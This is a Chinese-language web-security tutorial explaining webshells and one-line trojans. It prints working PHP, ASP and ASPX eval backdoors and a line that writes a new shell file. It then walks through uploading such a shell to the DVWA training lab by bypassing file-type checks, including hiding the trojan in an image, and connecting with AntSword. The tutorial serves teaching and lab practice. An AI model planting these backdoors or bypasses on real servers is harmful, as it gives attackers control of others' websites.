Web安全学习——Webshell和一句话木马

Webshell（大马）

webshell就是以 asp、aspx、php、jsp 或者cgi等网页文件形式存在的一种命令执行环境，也可以将其称做为一种网页后门。黑客在入侵了一个网站后，通常会将asp、aspx、php或jsp后门文件与网站web服务器目录下正常的网页文件混在一起，然后就可以使用浏览器来访问该后门文件了，从而得到一个命令执行环境，以达到控制网站服务器的目的。

顾名思义，“web”的含义是显然需要服务器开放web服务，“shell”的含义是取得对服务器某种程度上的操作权限。webshell常常被称为入侵者通过网站端口对网站服务器的某种程度上操作的权限。由于webshell其大多是以动态脚本的形式出现，也有人称之为网站的后门工具。

一方面，webshell被站长常常用于网站管理、服务器管理等等，根据FSO权限的不同，作用有在线编辑网页脚本、上传下载文件、查看数据库、执行任意程序命令等。

另一方面，被入侵者利用，从而达到控制网站服务器的目的。这些网页脚本常称为Web脚本木马，比较流行的asp或php木马，也有基于.NET的脚本木马与JSP脚本木马。

但是这里所说的木马都是些体积“庞大”的木马，也就是黑客中常称呼的” 大马 “。

一句话木马（小马）

因为上面所介绍webshell概念中提到的大马在现阶段的安全领域中已经被盯的非常紧了，而且各种杀毒软件和防火墙软件都对这种“大马”有了甄别能力，所以如果被渗透的web服务器中安装了防御软件的话，留下这种大马作为自己的webshell就非常困难了，于是一种新型的webshell就横空出世了，那就是一句话木马。

简单来说一句话木马就是通过向服务端提交一句简短的代码来达到向服务器插入木马并最终获得webshell的方法。

对于不同的语言有不同的构造方法，基本构造是首先出现的是脚本开始的标记，后边跟着的 eval 或者是 execute 是核心部分，就是获取并执行后边得到的内容，而后边得到的内容，是 request 或者是 $_POST 获取的值。如果我们通过客户端向服务器发送，那么就会让服务器执行我们发送的脚本，挂马就实现了。

一些不同脚本语言的一句话木马

php一句话木马：  <?php @eval($_POST[value]); ?>
asp一句话木马：  <%eval request ("value")%> 或  <% execute(request("value")) %>   
aspx一句话木马： <%@ Page Language="Jscript" %> <% eval(Request.Item["value"]) %>
 
<?php fputs( fopen('xie.php','w') , '<? php eval($_POST[xie]) ?>' ) ; ?>
将当前目录下创建xie.php文件，并且将一句话木马写入xd.php中

入侵条件

只要攻击者满足三个条件，就能实现成功入侵：

木马上传成功，未被杀
知道木马的路径在哪
上传的木马能正常运行

原理

拿php的一句话木马说明一下原理：

在PHP脚本语言中，eval(code) 的功能是将 code 组合成 php 指令，然后将指令执行，其他语言中也是使用此原理，只是函数可能不同。

1	<?php $a="phpinfo()"; eval("$a;");?>

@符号的意思是不报错，即使执行错误，也不报错。如果没有@符号，因为一个变量没有定义，就被拿去使用了，服务器就善意的提醒：Notice，你的xxx变量没有定义。

php里面几个超全局变量：$_GET、$_POST就是其中之一。$_POST['a']; 的意思就是a这个变量，用post的方法接收。

注释：传输数据的两种方法，get、post，post是在消息体存放数据，get是在消息头的url路径里存放数据（例如xxx.php?a=2）

eval()把字符串作为PHP代码执行

当利用web中的漏洞将<?php $a=”phpinfo()”; eval(“$a;”);?>一句话插入到了可以被黑客访问且能被web服务器执行的文件中时，那么我们就可以向此文件提交post数据，post方式提交数据的参数就是这个一句话中的 value，它就称为一句话木马的密码。这样提交的数据如果是正确的php语言的语句，那么就可以被一句话木马执行，从而达到黑客的恶意目的。

当然前提是：php配置文件php.ini里，关掉安全模式safe_mode = off，然后再看看禁用函数列表 disable_functions = proc_open, popen, exec, system, shell_exec ，把exec去掉，确保没有exec（有些cms为了方便处理某些功能，会去掉的）。

优点：短小精悍，功能强大。

缺点：容易被安全软件检测出来。为了增强隐蔽性，也出现了各种一句话木马的变形。

变形

黑客的目的，就是想尽办法给目标网站插入一句话木马，可以是一个单独的 .asp 或者是 .php，.aspx 文件，或者是隐藏在某些网页下。

在上边的例子中，php 文件很明显的 eval 可以成为一个静态特征码，webshell扫描工具可以以此为关键词，扫描到这种木马加以屏蔽。

利用

以DVWA中的文件上传漏洞，使用一句话木马

low

首先在本地保存一句话木马文件Hack.php：

1	<?php @eval($_POST['pass']);?>

查看后台源码

<?php
if( isset( $_POST[ 'Upload' ] ) ) {
    // Where are we going to be writing to?
    $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );

    // Can we move the file to the upload folder?
    if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
        // No
        echo '<pre>Your image was not uploaded.</pre>';
    }
    else {
        // Yes!
        echo "<pre>{$target_path} succesfully uploaded!</pre>";
    }
}
?>

从源码中发现，low级别未对上传的文件进行任何验证。所以可以直接上传PHP或者ASP一句话木马，此例采用php。

将一句话木马文件Hack.php上传，网页显示回显的路径

在该目录下也成功查看到Hack.php文件

利用蚁剑连接，右键添加，然后填写相关的数据

蚁剑页面操作说明：

1、是连接的URL，就是网站的主路径然后加上上传文件时回显的保存路径；
2、是菜刀连接时的密码，就是上面图片一句话提交的数据（本例为"pass")；
3、是一句话的解析类型，可以是asp，php，aspx。不同的解析类型的一句话内容不一样，文件后缀名不一样。

可以看到添加成功，双击进去就可以看到了整个网站的结构和文件

Medium

源码

 <?php

if( isset( $_POST[ 'Upload' ] ) ) {
    // Where are we going to be writing to?
    $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );

    // File information
    $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
    $uploaded_type = $_FILES[ 'uploaded' ][ 'type' ];
    $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];

    // Is it an image?
    if( ( $uploaded_type == "image/jpeg" || $uploaded_type == "image/png" ) &&
        ( $uploaded_size < 100000 ) ) {

        // Can we move the file to the upload folder?
        if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
            // No
            echo '<pre>Your image was not uploaded.</pre>';
        }
        else {
            // Yes!
            echo "<pre>{$target_path} succesfully uploaded!</pre>";
        }
    }
    else {
        // Invalid file
        echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
    }
}

?>

可以看到，Medium级别的代码对上传文件的类型、大小做了限制，要求文件类型必须是jpeg或者png，大小不能超过100000B（约为97.6KB）。

直接尝试修改文件名为Hack.png

发现可以上传成功，接下来用蚁剑尝试连接

有个小tips，在蚁剑连接时直接将上传的后缀改成phpj就可以连接了，不然会显示连接内容为空

High

木马如何才能上传成功？通常防御者都会对类型、大小、进行过滤。另外，若规定是上传的图片，还会对图片进行采集。即使攻击者修改文件类型，也过不了图片采集那一关。所以，这就需要一张图片来做掩护。做成隐藏在图片下的木马。linux和windows都有相应的命令，能够让一个文件融合到另一个文件后面，达到隐藏的目的。

源码

<?php
 if( isset( $_POST[ 'Upload' ] ) ) {
    // Where are we going to be writing to?
    $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );

    // File information
    $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
    $uploaded_ext  = substr( $uploaded_name, strrpos( $uploaded_name, '.' ) + 1);
    $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];
    $uploaded_tmp  = $_FILES[ 'uploaded' ][ 'tmp_name' ];

    // Is it an image?
    if( ( strtolower( $uploaded_ext ) == "jpg" || strtolower( $uploaded_ext ) == "jpeg" || strtolower( $uploaded_ext ) == "png" ) &&
        ( $uploaded_size < 100000 ) &&
        getimagesize( $uploaded_tmp ) ) {

        // Can we move the file to the upload folder?
        if( !move_uploaded_file( $uploaded_tmp, $target_path ) ) {
            // No
            echo '<pre>Your image was not uploaded.</pre>';
        }
        else {
            // Yes!
            echo "<pre>{$target_path} succesfully uploaded!</pre>";
        }
    }
    else {
        // Invalid file
        echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
    }
 }
?>

可以看到，High级别的代码读取文件名中最后一个”.”后的字符串，期望通过文件名来限制文件类型，因此要求上传文件名形式必须是“*.jpg”、“*.jpeg” 、“*.png”之一。同时，getimagesize（）函数更是限制了上传文件的文件头必须为图像类型。

直接改后缀名为.jpg会上传失败

将上传文件的文件头伪装成图片，首先利用copy命令将一句话木马文件Hack.php与正常的图片文件1..png合并：

【备注】以下为CMD下用copy命令制作“图片木马”的步骤，其中，1.png/b中“b”表示“二进制文件”，Hack.php/a中“a”表示ASCII码文件。

上传成功

用蚁剑连接